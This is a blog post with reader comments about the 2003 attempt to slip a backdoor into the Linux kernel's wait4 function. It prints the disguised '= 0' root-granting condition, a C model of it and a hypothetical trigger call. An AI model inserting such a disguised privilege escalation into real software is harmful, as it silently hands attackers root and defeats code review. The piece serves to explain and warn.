Josh wrote recently about a serious security bug that appeared in Debian Linux back in 2006, and whether it was really a backdoor inserted by the NSA. (He concluded that it probably was not.)
Today I want to write about another incident, in 2003, in which someone tried to backdoor the Linux kernel. This one was definitely an attempt to insert a backdoor. But we don’t know who it was that made the attempt—and we probably never will.
Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval.
But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get it via another version control system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy.
But on Nov. 5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change.
What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
            retval = -EINVAL;
[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.]
A casual expert reader would interpret this as innocuous error-checking code that makes wait4 return an error code when it is called in a certain way that the documentation forbids. But a really careful reader would notice that, near the end of the first line, it says “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero.
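To see the difference concretely, here is a minimal C sketch of the planted condition. The names are mine: a plain int stands in for current->uid, and an arbitrary constant BAD_OPTIONS stands in for __WCLONE|__WALL.

```c
#include <assert.h>

/* Minimal model of the planted condition. BAD_OPTIONS is an arbitrary
 * stand-in for __WCLONE|__WALL; uid stands in for current->uid.
 * In C, an assignment expression evaluates to the value assigned,
 * so (uid = 0) both clobbers uid and yields 0, i.e. false. */
#define BAD_OPTIONS 3

/* Returns the value uid holds after the check has run. */
int uid_after_check(int options, int uid)
{
    if ((options == BAD_OPTIONS) && (uid = 0))
        return -1;  /* dead code: (uid = 0) is always false */
    return uid;
}
```

Called with the “forbidden” options value, the function quietly returns 0 no matter what uid was passed in; called any other way, uid is untouched, because && short-circuits before the assignment runs.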
Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.
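As a rough, hypothetical sketch (assuming a kernel that carried the planted change; on any clean kernel the call has no special effect), the trigger could have been as simple as:

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/resource.h>

/* Hypothetical trigger, assuming a backdoored kernel: calling wait4
 * with the documented-as-invalid __WCLONE|__WALL combination would
 * have set the caller's uid to 0 (root). On a clean kernel, with no
 * children to wait for, the call simply fails and returns -1. */
long try_backdoor(void)
{
    int status;
    return (long)wait4(-1, &status, __WCLONE | __WALL, NULL);
}
```

On a backdoored kernel, getuid() after this call would have reported 0; on a clean kernel nothing happens beyond an ordinary error return.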
This is a very clever piece of work. It looks like innocuous error checking, but it’s really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up.
But the attempt didn’t work, because the Linux team was careful enough to notice that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.
Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we’ll never know.
[Post edited (2013-10-09) to correct the spelling of Larry McVoy’s name.]
It’s definitely a back door. Any unit test you wrote for it would fail: retval never gets set to -EINVAL, and even if it did, the next line of code (retval = -ECHILD;) would overwrite it.
Wow to read the number of posts on this topic is quite entertaining. My own perspective:
I never learned C, but after so many languages over the years I should have been able to decipher the problem without the explanation. I haven’t been coding for about 5 or 6 years, though, so I didn’t catch the actual problem that should have been so obvious. I did catch that a user ID of “0” would be “root,” and knowing this was a “back door” meant some type of elevated privileges. Not knowing the variables, I didn’t quite see how it played out, despite the fact that == is correctly used at the beginning and = is correctly used in the body executed on a true condition of the if statement. It should have been obvious that the = in the if condition was an assignment, even without knowing C, based on the line below it.
Having seen so many different languages, as soon as I began reading the explanation and was reminded of the assignment statement, it was obvious that the assignment was simply for the purpose of gaining root privileges if certain conditions were met by malicious code. But I still wondered about the result of the assignment below the if statement.
However, I found the noob question and all the varied answers quite entertaining; they reminded me yet again why there are so many mistakes: each language has its own unique conventions. In some languages == means [is congruent to], [is equal to], or [is the very same as]. Slight, subtle differences that make major differences in how they are used, depending on the specific language and variable type.
Same problem with =: sometimes it means [assign the right value to the left] and sometimes [is equal to]. As at least one person presumed and many people corrected (me not knowing C), I too would have presumed that setting the UID to 0 would make the if statement evaluate to “true” upon successful completion of the assignment; I am sure there are at least three languages where this is the case. However, many people pointed out that in C the returned value is simply the assigned value, which at 0 evaluates as false.
I would have presumed that “retval = -EINVAL” would be executed, and wondered exactly what that would do. But apparently it would never be reached in C. No matter; what concerns me more, however, is the lack of checks, not on the code but on the elevation of user privileges. Perhaps I feel this way because I have learned other languages besides C that grant me a third perspective, beyond the Boolean operation of the if statement.
While I have learned so many languages over the years that I can’t remember which are which, I am sure some return “true” or “1” upon successful completion of an assignment, “false” or “0” upon unsuccessful completion, and “null” on an error; and a “null” in an if statement should raise a fatal exception of some sort. That gives three actual possibilities for what would normally be a Boolean operation.
I would fully expect that the statement “current->uid = 0” to return either “null” or an error itself regardless of what that does to the “if” statement in question.
Now granted, this was introduced into the kernel itself, which obviously at times needs to grant root access to running applications. But it doesn’t particularly inspire great confidence in the Linux kernel that any routine in the kernel can successfully assign the current user ID to “root.” Why would it make that assignment without some other checks in place? Especially when the routine (wait4 in this case) is nothing more than an API call available to any application running on top of the kernel.
The arguments of purposeful backdoor versus coding error aside (and I have made that type of error many a time), I am more worried about the ease of assigning root privileges. Shouldn’t the variable “uid” for any running application be very well protected within the kernel? It shouldn’t be changeable on a whim by just any call to kernel-level routines. At least that is my opinion, again from the perspective that Boolean operations need not be Boolean in fact, and the idea that some variables should not be accessible to most routines even within the kernel itself. But then again, I admit one thing: I don’t code operating systems, so maybe it’s not possible to protect certain variables at that level?
… and that’s why people invented static code analysis: To give you warnings for this kind of stuff (in this case: assignment while comparison is expected)
other questions for consideration:
– Why is “Cyber” considered the 5th domain of warfare?
– not just a bunch of geeks, but a quite high command organization in the US military structure under StratCOM (Strategic command) – http://en.wikipedia.org/wiki/Unified_Combatant_Command
– domains 1–4 of warfare: land, sea, air, space. Cyber is considered so powerful as to be able to fundamentally change the nature of warfare, as these original 4 did as they evolved over history
– Given its considered strategic importance, what methods would be employed to enable this 5th domain of warfare?
– I work at . I see published vulnerabilities and what they are, in our software and other people’s software, at the operating system and application level, in closed-source systems and applications, and I ask myself: “How would that get there?”
-“who benefits from it, if it was malicious?”
– “Who has the level of resources to take long term malicious actions to implant and manufacture the vulnerabilities to then exploit? …
– “What are the top software applications in terms of installed base, in any category?”
– “Top OS installed base, any category?”
– “How does this correlate with discovered and published security vulnerability rate and severity?”
*I* would focus on it like a special-action group from the NBC/WMD days: insert people who are not what they appear to be into places where they have trusted access, to get information out and to put things in place inside, for future use, in the places I want, to achieve my goals.
in an age of the 5th domain of warfare… don’t the same methods of politics, economics, intelligence and warfare still work also?
How does one create trusted systems in an environment where NIST goes back on previous crypto recommendations, after it is revealed that NSA weakened aspects of the crypto? http://spectrum.ieee.org/telecom/security/can-you-trust-nist
Doesn’t everything need to be
1) public
2) fully disclosed as far as algorithms, source code and analysis/results of [secure coding audits|vulnerability scans|penetration tests|developer identities (with privacy protections for the devs, full data held in escrow)|statistics of vulnerabilities]
3) tracked as to identity of developer?
so, I think the time is right now to discuss what I think is needed in the long run for all software development, but particularly open source:
– a system which validates and uniquely identifies all developers who submit code to participating projects (with some identity attributes perhaps held at a trusted clearing house, like a certificate authority, but not generally publicly available to the world at large)
Why is this needed? Just accept it… in the age of a successful Aurora test (see YouTube, http://youtu.be/fJyWngDco3g , or search engines for “Aurora test”).
Consider instead the evidence:
– Stuxnet
– Duqu
– Flame etc
– DHS, S&T directorate, Supply Chain Hygiene is a practice and program area. It encompasses lots of things such as biologicals and poisoned food stuffs, but also including areas like counterfeit and subverted components in computer systems and software
– NIST – SP 800-53 rev4, consider all the added things in there around supply chain of software and hardware for infrastructure supporting US civilian government IT. There is a *lot* in this ~500 page document around trusted source of development of code and trustworthiness of developer of software.
– Years of allegations and some noise and publicity of undisclosed evidence of ZTE and Huawei equipment being subverted for Chinese government purposes, from the factory
– Bans for many years now on Lenovo hardware use by US, UK and Australian intelligence community
So, consider the motivations at work to drive .govvies to write all this into requirements at length in NIST SP 800-53 rev4. Why?
– NIST is staffed with smart people. Physicists. Engineers. Why go to the trouble to write these extensive requirements and make it expensive to deliver IT services within the govt, as well as for external service providers to deliver services meeting these requirements to the US govt? (These are requirements of FedRAMP, the compliance framework for “cloud” and other services to govt; I think any external service to govt could and will be classified as “cloud computing” nowadays.) In the current environment of debt-ceiling and similar political arguments, can you imagine the internal pressure to reduce costs? How can requirements which massively increase costs survive?
A: there is broad evidence of these sorts of threats from other nations, as well as wide-enough internal knowledge among the management approving these requirements documents that these same methods are how the US Govt and their people (DoE-managed evil geniuses at work in the National Labs, among other places) are able to deliver results such as Stuxnet against our geopolitical friends, enemies and otherwise innocent bystanders.
In the age of NSA disclosures, is there such a thing as a “friend” between nations? Was there ever? Aren’t ‘friends’ just potential future enemies, someone to monitor in case an election or coup goes sideways for you? (See Iran, Egypt, Greece, France, Italy, Indonesia, etc.)
For OSS to remain viable and actually completely prove that the bazaar is better than the pyramid/cathedral model, a system for trusted development is required.
needed features (incomplete list):
– public validation of the source developer of code insertion into OSS projects
– trusted and irrefutable ID of said developer, with a multi-way trust system for validating identity of the developer prior to admission and acceptance of code submissions
– long-term tracking of every change across the OSS world, recording:
– what the change was
– the identity of the change submission, tracked back to a validated developer identity
– long term tracking and association of developer code submissions to later discovered security vulnerabilities and “bugs”
– PUBLIC SCOREBOARD of security bug score of every developer (their career “batting average”) which allows statistical discovery by data analysis of who and where software development supply chain threats are originating, and statistical exposure of the subverters. You can’t hide from data analysis.
This is the public speaking of a thought I have had for quite some time, since starting to look at emerging US government requirements… the NSA disclosures just reinforced my opinions.
“But the attempt didn’t work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.”
Um, the Linux devs didn’t notice this. It was found as part of the validation process when exporting the tree from BK to CVS.
Source: I’m the guy who found the problem.
Indeed very interesting — thanks for telling the story!
Minor correction: “Larry McVoy” (not “McAvoy”).
Clearly, it was the ac1db1tch3z http://www.phrack.org/issues.html?issue=64&id=15&mode=txt 😛
It’s funny how many times I’ve seen this particular backdoor discussed, and it’s funny that every single conversation has devolved into a debate about the merits of Yoda comparison… aren’t you all forgetting the point?
If a developer doesn’t adhere to Yoda comparison, the only thing that’s going to find that is StyleCop. Just because you use Yoda comparison doesn’t mean the next developer does, and unless the code reviewer checks for it prior to check-in, it could just as easily slip under the wire. And even if you all (for example) use Yoda comparison, if I want to sneak something like this in under the radar, do you think I’m going to use Yoda comparison? Unlikely…
The point of discussion isn’t if the technique should be used or not, it’s the fact that this technique got used and appears to have been used with malicious intent.
Wouldn’t the compiler warn you about this? I only wrote a little bit of C but I remember the compiler warning me about this.
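Yes and no. With -Wall, GCC’s -Wparentheses flags a bare assignment used as a condition (“suggest parentheses around assignment used as truth value”). But an assignment wrapped in its own set of parentheses, which is exactly the shape the planted code used as an operand of &&, is the accepted “yes, I meant it” idiom and compiles without a peep. A small sketch (the function and variable names are mine):

```c
#include <assert.h>

/* if (uid = 0) ...    <- gcc -Wall would warn here: "suggest
 *                        parentheses around assignment used as
 *                        truth value"                              */
int parenthesized(int uid)
{
    if ((uid = 0))  /* extra parens suppress the warning, as in the backdoor */
        return 1;   /* never reached: the assigned value 0 is false */
    return uid;     /* uid is now 0, whatever was passed in */
}
```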
A devious person would set both the __WCLONE and __WALL options before calling the wait4 function. Unless the options match, the rest of the expression is not evaluated. I’m also guessing that this combination of options is not normally in use, so that only a hacker who knew about the backdoor would write a program that could use it.
this is PHP, but yes, it does set it to 1 (you can try it yourself from the command line):
php -r '$foo = 0; if ($foo = 1) {} echo $foo;'
1
@noob: This is C, where pointers make scope more complicated than in today’s world of garbage collection. Read up on pointers.
@noob: if() works on a Boolean value, obtained by evaluating the given expression. Normally the expression is a comparison between two values, but in this case it’s an assignment of a value to a variable, and the result of that assignment is what gets fed to the if().
You can just as well put a whole function call in there, and all the code in the function will be executed to produce a single value in the end, true or false.
Hope this kinda helps.
Maybe I’m a noob (actually, I definitely am), but how could it possibly set the uid to root (0) if it’s nested in an if statement? Does the mere appearance of the assignment lead to a change in the variable, even if it’s just in an if statement?
A coding-style rule can help here: use
(0 == foo) instead of (foo == 0).
Then the typing mistake 0 = foo will not even compile, and if you really want foo = 0, everyone will notice the change.
Librement
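A minimal sketch of that rule (the function name is mine): with the constant on the left, the single-‘=’ typo becomes a hard compile error (“lvalue required as left operand of assignment”) rather than a silent assignment.

```c
#include <assert.h>

/* "Yoda" ordering: the constant goes on the left of the comparison. */
int is_root_yoda(int uid)
{
    if (0 == uid)   /* the typo `0 = uid` would not even compile */
        return 1;
    return 0;
}
```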
Typing an assignment (foo = 0) rather than the comparison you intended (foo == 0) is a fairly common error that you will likely see now and then in hastily written code. Fortunately it’s also the kind of error you are likely to recognize and correct quickly, say when re-reading your code after catching up on sleep.
What makes this interesting is the backstory that somebody apparently broke into the server in order to introduce this rather nasty bug.